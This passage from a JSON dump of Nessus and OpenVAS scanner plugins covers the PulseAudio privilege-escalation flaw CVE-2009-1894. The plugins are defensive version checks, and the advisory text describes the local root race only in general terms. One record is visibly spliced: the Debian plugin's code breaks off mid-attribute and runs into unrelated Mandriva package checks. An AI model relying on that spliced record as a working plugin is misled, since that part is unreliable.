pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulsecore5\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulsecore5-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio\", 
pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-esound-compat\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-esound-compat-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-gconf\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-gconf-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-hal\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-hal-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-lirc\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-lirc-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-x11\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-x11-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-zeroconf\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-module-zeroconf-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-utils\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pulseaudio-utils-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse-browse0\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse-browse0-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse-dev\", pkgver:\"0.9.14-0ubuntu20.2\")) 
flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse-mainloop-glib0\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse-mainloop-glib0-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse0\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulse0-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulsecore9\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpulsecore9-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio\", pkgver:\"1:0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-esound-compat\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-esound-compat-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-gconf\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-gconf-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-hal\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-hal-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-lirc\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-lirc-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-x11\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-x11-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", 
pkgname:\"pulseaudio-module-zeroconf\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-zeroconf-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-utils\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-utils-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpulse-browse0 / libpulse-browse0-dbg / libpulse-dev / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:05:13", "description": "Tavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon does not drop privileges before re-executing itself, enabling local attackers to increase their privileges.", "cvss3": {"score": null, "vector": null}, "published": "2010-02-24T00:00:00", "type": "nessus", "title": "Debian DSA-1838-1 : pulseaudio - privilege escalation", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:pulseaudio", "cpe:/o:debian:debian_linux:5.0"], "id": "DEBIAN_DSA-1838.NASL", "href": "https://www.tenable.com/plugins/nessus/44703", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1838. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44703);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-1894\");\n script_xref(name:\"DSA\", value:\"1838\");\n\n script_name(english:\"Debian DSA-1838-1 : pulseaudio - privilege escalation\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Tavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon\ndoes not drop privileges before re-executing itself, enabling local\nattackers to increase their privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=537351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1838\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the pulseaudio packages.\n\nThe old stable distribution (etch) is not affected by this issue.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.9.10-3+lenny1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:pulseaudio\");\n 
isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.15~2.0.6mdv2009.1\", 
rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:20", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:171.", "cvss3": {}, "published": "2009-08-17T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:171 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064503", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064503", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_171.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:171 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in pulseaudio:\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered\nthat pulseaudio, when installed setuid root, does not drop privileges\nbefore re-executing itself to achieve immediate bindings. This can\nbe exploited by a user who has write access to any directory on the\nfile system containing /usr/bin to gain local root access. The user\nneeds to exploit a race condition related to creating a hard link\n(CVE-2009-1894).\n\nThis update provides fixes for this vulnerability.\n\nAffected: Enterprise Server 5.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:171\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:171.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64503\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-17 16:54:45 +0200 (Mon, 17 Aug 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:171 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.10~11.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:32", "description": "The remote host is missing updates announced in\nadvisory GLSA 200907-13.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200907-13 (pulseaudio)", "bulletinFamily": 
"scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064435", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064435", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability in PulseAudio may allow a local user to execute code with\nescalated privileges.\";\ntag_solution = \"All PulseAudio users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-sound/pulseaudio-0.9.9-r54'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200907-13\nhttp://bugs.gentoo.org/show_bug.cgi?id=276986\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200907-13.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64435\");\n script_version(\"$Revision: 9350 